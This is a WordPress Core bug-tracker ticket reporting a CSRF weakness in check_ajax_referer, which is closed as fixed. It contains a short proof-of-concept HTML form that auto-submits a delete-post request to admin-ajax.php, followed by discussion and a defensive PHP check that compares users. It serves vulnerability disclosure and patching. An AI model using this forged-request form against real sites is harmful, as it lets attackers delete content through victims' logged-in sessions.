Make WordPress Core

Opened 7 years ago

Closed 7 years ago

#4939 closed defect (bug) (fixed)

check_ajax_referer does not protect from CSRF at all

Reported by: xknown
Owned by:
Milestone: 2.3
Priority: high
Severity: normal
Version: 2.3
Component: Security
Keywords:
Focuses:
Cc:

Description

check_ajax_referer only checks if the incoming request contains valid user credentials but wp_get_current_user still uses WP cookies to determine the current user, so anyone with a subscriber role (or another role) can perform CSRF attacks.

<html>
<body>
	<form method="post" action="http://localhost/wp/wp-admin/admin-ajax.php">
		<input type="text" name="action" value="delete-post" />
		<input type="text" name="id" value="Post_ID" />
		<input type="text" name="cookie" value="wordpressuser_sitehash=subscriber; wordpresspass_sitehash=password" />		
	</form>
	<script>document.forms[0].submit();</script>
</body>
</html>

Attachments (2)

pluggable.diff (357 bytes) - added by xknown 7 years ago.
Set current user in check_ajax_referer.
4939.diff (977 bytes) - added by mdawaffe 7 years ago.

Change History (5)

xknown, 7 years ago

Set current user in check_ajax_referer.

comment:1 mdawaffe, 7 years ago

Rather than setting the user, we could check to see if the current user matches the user from the cookie and die('-1') otherwise.
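Added example (PHP, not WordPress's own code and not either attached diff) of the check proposed above: compare the user named in the request's cookie parameter with the user the browser session resolved to, and die('-1') on a mismatch. The function names ajax_cookie_user and ajax_user_matches_session are hypothetical, and the cookie name passed in stands in for WordPress's USER_COOKIE constant.

```php
<?php
// Added example, not the ticket's patch: the guard mdawaffe proposes in comment:1.
// check_ajax_referer() identifies the actor from the `cookie` request parameter,
// while wp_get_current_user() resolves the browser's real cookies. When the two
// users differ, the request did not come from the logged-in user's own script.

// Pull the login name out of the `cookie` parameter, which AJAX scripts send as
// cookie=document.cookie ("wordpressuser_<hash>=login; wordpresspass_<hash>=...").
// $userCookieName plays the role of WordPress's USER_COOKIE constant (assumed).
function ajax_cookie_user(string $cookieParam, string $userCookieName): ?string
{
    foreach (explode('; ', urldecode($cookieParam)) as $pair) {
        if (strpos($pair, '=') === false) {
            continue;
        }
        [$name, $value] = explode('=', $pair, 2);
        if ($name === $userCookieName) {
            return $value;
        }
    }
    return null;
}

// The proposed check: the user named in the request's cookie parameter must be
// the same user the browser session resolved to. A missing login on either side
// also fails, so an anonymous request cannot slip through.
function ajax_user_matches_session(string $cookieParam, string $userCookieName, string $currentLogin): bool
{
    $claimed = ajax_cookie_user($cookieParam, $userCookieName);
    return $claimed !== null && $currentLogin !== '' && hash_equals($currentLogin, $claimed);
}

// Constructed sample: the victim's browser is logged in as "admin" while the form
// from the report supplies a subscriber's credentials in the `cookie` field.
$userCookieName = 'wordpressuser_sitehash';
$forged  = 'wordpressuser_sitehash=subscriber; wordpresspass_sitehash=password';
$genuine = 'wordpressuser_sitehash=admin; wordpresspass_sitehash=<md5 of admin pw>';
$currentLogin = 'admin'; // the login wp_get_current_user() resolved from real cookies

foreach ([$forged, $genuine] as $cookieParam) {
    if (!ajax_user_matches_session($cookieParam, $userCookieName, $currentLogin)) {
        echo "rejected (die('-1') in check_ajax_referer): $cookieParam\n";
    } else {
        echo "accepted, proceed to wp_login() credential check: $cookieParam\n";
    }
}
```

The match only establishes that the request names the session's own user; the existing credential check against the supplied cookie values still has to run afterwards.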

mdawaffe, 7 years ago

comment:2 Nazgul, 7 years ago

  • Milestone set to 2.3
  • Priority changed from normal to high

comment:3 ryan, 7 years ago

  • Resolution set to fixed
  • Status changed from new to closed

(In [6138]) Extra protection in check_ajax_referer from mdawaffe. fixes #4939